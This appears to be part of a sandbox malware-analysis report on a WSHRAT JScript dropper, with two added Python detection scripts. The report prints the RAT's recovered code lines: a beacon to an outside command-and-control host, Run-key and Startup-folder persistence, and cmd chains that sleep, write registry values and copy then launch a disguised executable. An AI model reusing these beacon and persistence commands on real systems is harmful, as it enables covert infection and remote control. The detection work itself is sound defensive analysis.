Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: wbem locator
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: '$'<'
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: mmnopqrs
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: b81a4609
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: wmi object factory
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: >4>d>
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: l0l@lxlpl
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: m$m@m`m
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: acdefghij
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: jonesimv2
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: b81a46092
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: jones-pc2q
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: stujwxyz
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 6892type
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: psfactorybuffer
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: universal refresher8
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: nt authority\system+
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: appdata\local&
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: wbem class object
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: call contextd=x
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: local appdata-21786
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: l32.dll,
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ^lb&!
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: hthe download of the specified resource has failed.
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ware\microsoft\windows\currentversion\run\adobe".
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ones\appdata\r
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: invalid root in registry key "hkey_local_machine\software\microsoft\windows\currentversion\run\adobe".r
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: xwscript.exe //b "c:\users\user\appdata\local\temp\adobe.js"rosoft\windows\currentversion\run\adobe".e
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: invalid root in registry key "hkey_local_machine\software\microsoft\windows\currentversion\run\adobe".t
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: invalid root in registry key "hkey_local_machine\software\microsoft\windows\currentversion\run\adobe".g
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: xwscript.exe //b "c:\users\user\appdata\local\temp\adobe.js"
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \windows\currentversion\run\adobe".i
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: hkey_local_machine\software\microsoft\windows\currentversion\run\adobedows\currentversion\run\adobe".
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: hkey_current_user\software\microsoft\windows\currentversion\run\adobendows\currentversion\run\adobe".+
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: >microsoft jscript runtime errorey_local_machine\software\microsoft\windows\currentversion\run\adobe".i
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ware\microsoft\windows\currentversion\run\adobe".i
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ware\microsoft\windows\currentversion\run\adobe".d
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: invalid root in registry key "hkey_local_machine\software\microsoft\windows\currentversion\run\adobe".favoritesw
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: invalid root in registry key "hkey_local_machine\software\microsoft\windows\currentversion\run\adobe".;
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: invalid root in registry key "hkey_local_machine\software\microsoft\windows\currentversion\run\adobe".*
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 0onts
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ::$datas@shell32.dll,-21813
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ifilesystem3.drives();
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: idrivecollection._newenum();memstr_50f67083-b
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: idrive.isready();memstr_e7c66ea4-6
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: idrive.freespace();memstr_3243ce99-0
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: idrive.drivetype();memstr_f7249dad-6
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iserverxmlhttprequest2.open("post", "http://lee44.kozow.com:6892/is-ready", "false");memstr_a910c877-f
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iserverxmlhttprequest2.setrequestheader("user-agent:", "wshrat|b81a4609|user-pc|user|microsoft windows 10 pro|plus|windows defender .|false - 15/4/2025|jav");memstr_d29e70d6-e
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iserverxmlhttprequest2.send("");memstr_0af4a07a-4
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ihost.sleep("5000");memstr_fe6cad85-c
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iwshshell3.regwrite("hkey_current_user\software\microsoft\windows\currentversion\run\adobe", "wscript.exe //b "c:\users\user\appdata\local\temp\adobe.js"", "reg_sz");memstr_da0362c8-9
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iwshshell3.regwrite("hkey_local_machine\software\microsoft\windows\currentversion\run\adobe", "wscript.exe //b "c:\users\user\appdata\local\temp\adobe.js"", "reg_sz");memstr_9e010d45-c
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ihost.scriptfullname();memstr_67585228-2
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ifilesystem3.copyfile("c:\users\user\appdata\local\temp\adobe.js", "c:\users\user\appdata\local\temp\adobe.js", "true");memstr_c20cee8a-b
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ifilesystem3.copyfile("c:\users\user\appdata\local\temp\adobe.js", "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\st", "true");memstr_17c43e61-1
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: indows 10 pro|plus|windows defender .|false - 15/4/2025|jav");memstr_6f8b09ab-8
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: on._newenum();memstr_c01b0a69-7
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ::$dataon._newenum();memstr_8864aa06-f
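The ServerXMLHTTP strings recovered from wscript.exe memory above are the WSHRAT check-in: a POST to http://lee44.kozow.com:6892/is-ready with a pipe-delimited host fingerprint in the User-Agent ("wshrat|b81a4609|user-pc|user|microsoft windows 10 pro|plus|windows defender .|false - 15/4/2025|jav"), then a 5 s sleep, then the Run-key and Startup-folder persistence. The following detection is an added example written for this report, not code from the sample or from Joe Sandbox: it parses the beacon User-Agent and scores HTTP request records for the two signals the strings expose, the fingerprint layout and the /is-ready path on a non-standard port. The log format is constructed (tab-separated), the field names after "os" (edition_flag, flag_and_date, version) are assumptions about what those positions mean, and the sample records are invented for the test. The script sets the header name as "user-agent:" with a trailing colon; matching on the pipe-delimited value rather than on the header name avoids depending on how that quirk appears on the wire.

```python
from dataclasses import dataclass
from typing import List, Optional
from urllib.parse import urlsplit

# Field layout of the beacon User-Agent recovered from wscript.exe memory:
#   wshrat|b81a4609|user-pc|user|microsoft windows 10 pro|plus|windows defender .|false - 15/4/2025|jav
# "family", "bot_id", "hostname", "username", "os" and "antivirus" follow from the
# values themselves; "edition_flag", "flag_and_date" and "version" are assumed names.
UA_FIELDS = ("family", "bot_id", "hostname", "username", "os",
             "edition_flag", "antivirus", "flag_and_date", "version")

CHECKIN_PATH = "/is-ready"             # check-in path seen in the report
COMMON_HTTP_PORTS = {80, 443, 8080, 8443}


@dataclass
class Finding:
    src_ip: str
    c2_host: str
    c2_port: int
    reason: str
    bot_id: Optional[str] = None
    hostname: Optional[str] = None


def parse_wshrat_ua(user_agent: str) -> Optional[dict]:
    """Return the beacon fields if the User-Agent has the WSHRAT layout, else None."""
    parts = [p.strip() for p in user_agent.split("|")]
    if len(parts) != len(UA_FIELDS) or parts[0].lower() != "wshrat":
        return None
    return dict(zip(UA_FIELDS, parts))


def inspect_request(src_ip: str, method: str, url: str, user_agent: str) -> Optional[Finding]:
    """Score one HTTP request; the fingerprint alone is enough, the path needs the odd port."""
    u = urlsplit(url)
    host = u.hostname or ""
    port = u.port or (443 if u.scheme == "https" else 80)
    fields = parse_wshrat_ua(user_agent)
    if fields is not None:
        return Finding(src_ip, host, port,
                       "WSHRAT beacon User-Agent (pipe-delimited host fingerprint)",
                       bot_id=fields["bot_id"], hostname=fields["hostname"])
    if method.upper() == "POST" and u.path == CHECKIN_PATH and port not in COMMON_HTTP_PORTS:
        return Finding(src_ip, host, port,
                       "POST to /is-ready on a non-standard port (WSHRAT check-in path)")
    return None


def scan_log(lines: List[str]) -> List[Finding]:
    """Constructed record format: ts<TAB>src_ip<TAB>method<TAB>url<TAB>user_agent."""
    findings: List[Finding] = []
    for line in lines:
        line = line.rstrip("\n")
        if not line or line.startswith("#"):
            continue
        try:
            _ts, src_ip, method, url, ua = line.split("\t", 4)
        except ValueError:
            continue  # malformed record: skip it rather than abort the sweep
        finding = inspect_request(src_ip, method, url, ua)
        if finding is not None:
            findings.append(finding)
    return findings


# Constructed sample records (not taken from the report's capture): one beacon with the
# fingerprint, one check-in with a generic UA, one benign request, one malformed line.
SAMPLE_LOG = [
    "2025-04-15T10:21:03Z\t10.0.0.23\tPOST\thttp://lee44.kozow.com:6892/is-ready\t"
    "wshrat|b81a4609|user-pc|user|microsoft windows 10 pro|plus|windows defender .|false - 15/4/2025|jav",
    "2025-04-15T10:21:08Z\t10.0.0.23\tPOST\thttp://lee44.kozow.com:6892/is-ready\tMozilla/5.0",
    "2025-04-15T10:21:09Z\t10.0.0.24\tGET\thttps://www.example.com/\tMozilla/5.0",
    "garbage line without tabs",
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        extra = f" (bot_id={f.bot_id}, host={f.hostname})" if f.bot_id else ""
        print(f"{f.src_ip} -> {f.c2_host}:{f.c2_port}: {f.reason}{extra}")
```

The bot_id and hostname pulled from the fingerprint are what you pivot on across proxy logs: the same bot_id beaconing from several source addresses means the infected host moved networks, not that there are several infections.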
Source: wscript.exe, 00000008.00000002.2595501978.000000A4685FD000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: m32\gdi3p
Source: wscript.exe, 00000008.00000002.2595501978.000000A4685FD000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: +local\sm0:5872:304:wilstaging_02_p0hl
Source: wscript.exe, 00000008.00000002.2595501978.000000A4685FD000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: `p@ra
Source: wscript.exe, 00000008.00000002.2595501978.000000A4685FD000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: /5rr
Source: wscript.exe, 00000008.00000002.2595501978.000000A4685FD000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: wsh-timer
Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: {7584717 -
Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: 16bd0}
Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\desktop.ini/h
Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: \microsoft\w
Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: dows\start menu\rams\startup
Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: {7584717
Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\desktop.ini
Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: dows\start menu\rams6
Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: :hg/h
Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: ++c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\desktop.ini
Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: \pk/h
Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: em32\she
Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: zdwpt
Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: programs
Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: @da\r @
Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: @shell32.dll,-21782
Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: \user\appdata\roaming\m
Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: 476751002
Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: @at}0
Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: ntfst
Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: c:\users\user\appdata\local\temp\adobe.js
Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: p^/@n
Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: 3++s++
Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: the specified resource h
Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: dvm<i
Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: sleep
Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: wc:\users\user\appdata\local\temp\adobe.js'r
Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: c:\windows\system32\wscript.exe
Source: wscript.exe, 00000008.00000002.2595677350.000000A468AFC000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: 247675102476751002
Source: wscript.exe, 00000008.00000002.2595677350.000000A468AFC000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: s-1-5-21-2246122658-3693405117-24767
Source: wscript.exe, 00000008.00000002.2595677350.000000A468AFC000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: 2476751002
Source: wscript.exe, 00000008.00000002.2595677350.000000A468AFC000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: tdll.dll
Source: wscript.exe, 00000008.00000002.2595677350.000000A468AFC000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: lee44.kozow.com
Source: wscript.exe, 00000008.00000002.2595677350.000000A468AFC000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: prxyh#
Source: wscript.exe, 00000008.00000002.2596539768.000001F861CAF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: xwscript.exe //b "c:\users\user\appdata\local\temp\adobe.js"
Source: wscript.exe, 00000008.00000002.2596539768.000001F861CAF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: glxwscript.exe //b "c:\users\user\appdata\local\temp\adobe.js"
Source: wscript.exe, 00000008.00000002.2596539768.000001F861CAF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: otc:\users\user\appdata\local\temp\adobe.jsal\temp\adobe
Source: wscript.exe, 00000008.00000002.2596539768.000001F861CAF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: soxwscript.exe //b "c:\users\user\appdata\local\temp\adobe.js"ngsng[
Source: wscript.exe, 00000008.00000002.2596539768.000001F861CAF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: .tc:\users\user\appdata\local\temp\adobe.jsal\temp\adobe
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\rHMh.js"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\DPGLXM.js"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\adobe.js"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\notepad.js"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\Temp\JaG.exe "C:\Users\user\AppData\Local\Temp\JaG.exe"
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 65 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "audiodg.exe" /t REG_SZ /d "C:\Users\user\Audio\Windows Audio.exe"
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 72 > nul && copy "C:\Users\user\AppData\Local\Temp\JaG.exe" "C:\Users\user\Audio\Windows Audio.exe" && ping 127.0.0.1 -n 72 > nul && "C:\Users\user\Audio\Windows Audio.exe"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\adobe.js"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 65
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "audiodg.exe" /t REG_SZ /d "C:\Users\user\Audio\Windows Audio.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 72
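The process tree above is the whole dropper chain in command lines: wscript.exe running .js stages out of %TEMP% (adobe.js re-launched with //B so no error dialogs appear), wscript.exe starting JaG.exe from %TEMP%, and JaG.exe driving cmd.exe through "ping 127.0.0.1 -n 65/72 > nul &&" as a sleep before REG ADD writes the Run value and before the copy to "C:\Users\user\Audio\Windows Audio.exe" is executed. The following is an added example, not part of the Joe Sandbox report or the sample: it runs those command-line and parent-child checks over process-creation records (Sysmon Event ID 1 style; the ProcEvent fields and the sample events are constructed to mirror the tree above, with pids invented) and returns one alert per matched rule. The 10-echo threshold for the ping sleep is an assumption to keep single connectivity pings out of the results.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# Patterns built from the command lines in the report's process tree.
PING_SLEEP = re.compile(r"\bping(?:\.exe)?\s+127\.0\.0\.1\s+-n\s+(\d+)", re.I)
REG_RUN_ADD = re.compile(
    r'\breg(?:\.exe)?\s+add\s+"?(?:hkcu|hklm|hkey_current_user|hkey_local_machine)'
    r"\\software\\microsoft\\windows\\currentversion\\run\b", re.I)
SCRIPT_TEMP_JS = re.compile(
    r'\b[wc]script(?:\.exe)?"?\s+(?P<flags>(?://\w+\s+)*)"?[^"]*'
    r'\\appdata\\local\\temp\\[^\\"]+\.js', re.I)
COPY_PAIR = re.compile(r'\bcopy\s+"([^"]+)"\s+"([^"]+)"', re.I)
TEMP_DIR = re.compile(r"\\appdata\\local\\temp\\", re.I)
SCRIPT_HOST = re.compile(r"\\[wc]script\.exe$", re.I)
SLEEP_THRESHOLD = 10   # assumed: -n counts below this are treated as ordinary pings


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


@dataclass
class Alert:
    pid: int
    rule: str
    detail: str


def analyze(events: List[ProcEvent]) -> List[Alert]:
    """Apply the command-line and parent-child rules; one Alert per (pid, rule) hit."""
    by_pid: Dict[int, ProcEvent] = {e.pid: e for e in events}
    alerts: List[Alert] = []
    for e in events:
        cmd = e.cmdline
        m = PING_SLEEP.search(cmd)
        if m and "&&" in cmd and int(m.group(1)) >= SLEEP_THRESHOLD:
            n = int(m.group(1))
            alerts.append(Alert(e.pid, "loopback_ping_sleep_chain",
                                f"{n} loopback echoes (about {n - 1}s) before a chained command"))
        if REG_RUN_ADD.search(cmd):
            alerts.append(Alert(e.pid, "run_key_via_reg_add",
                                "reg.exe writes a CurrentVersion\\Run value"))
        m = SCRIPT_TEMP_JS.search(cmd)
        if m:
            bg = "background (//B) " if "//b" in m.group("flags").lower() else ""
            alerts.append(Alert(e.pid, "script_host_runs_temp_js",
                                f"{bg}execution of a .js file from %TEMP%"))
        m = COPY_PAIR.search(cmd)
        if m and f'"{m.group(2)}"' in cmd[m.end():]:
            alerts.append(Alert(e.pid, "copy_then_execute",
                                f"copies {m.group(1)} to {m.group(2)} and launches the copy"))
        parent = by_pid.get(e.ppid)
        if parent is not None:
            if TEMP_DIR.search(parent.image) and e.image.lower().endswith("\\cmd.exe"):
                alerts.append(Alert(e.pid, "temp_binary_spawns_cmd", f"parent {parent.image}"))
            if SCRIPT_HOST.search(parent.image) and TEMP_DIR.search(e.image):
                alerts.append(Alert(e.pid, "script_host_launches_temp_binary",
                                    f"{parent.image} started {e.image}"))
    return alerts


# Constructed events mirroring the report's tree (pids invented), plus one benign ping.
EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\System32\wscript.exe",
              r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\DPGLXM.js"'),
    ProcEvent(101, 100, r"C:\Windows\System32\wscript.exe",
              r'"C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\adobe.js"'),
    ProcEvent(200, 100, r"C:\Users\user\AppData\Local\Temp\JaG.exe",
              r'"C:\Users\user\AppData\Local\Temp\JaG.exe"'),
    ProcEvent(300, 200, r"C:\Windows\SysWOW64\cmd.exe",
              r'"cmd" /c ping 127.0.0.1 -n 65 > nul && REG ADD "HKCU\Software\Microsoft\Windows'
              r'\CurrentVersion\Run" /f /v "audiodg.exe" /t REG_SZ /d "C:\Users\user\Audio\Windows Audio.exe"'),
    ProcEvent(301, 200, r"C:\Windows\SysWOW64\cmd.exe",
              r'"cmd" /c ping 127.0.0.1 -n 72 > nul && copy "C:\Users\user\AppData\Local\Temp\JaG.exe" '
              r'"C:\Users\user\Audio\Windows Audio.exe" && ping 127.0.0.1 -n 72 > nul && '
              r'"C:\Users\user\Audio\Windows Audio.exe"'),
    ProcEvent(302, 300, r"C:\Windows\SysWOW64\PING.EXE", "ping 127.0.0.1 -n 65"),
    ProcEvent(303, 300, r"C:\Windows\SysWOW64\reg.exe",
              r'REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "audiodg.exe"'
              r' /t REG_SZ /d "C:\Users\user\Audio\Windows Audio.exe"'),
    ProcEvent(400, 1, r"C:\Windows\System32\cmd.exe", "cmd /c ping 10.0.0.1 -n 4"),
]

if __name__ == "__main__":
    for a in analyze(EVENTS):
        print(f"pid {a.pid}: {a.rule}: {a.detail}")
```

The child ping.exe and reg.exe events on their own only trip the Run-key rule; the sleep-then-persist pattern is visible in the cmd.exe parent's command line, which is why the rules look at the full chained line rather than at each child process separately.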
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\JaG.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
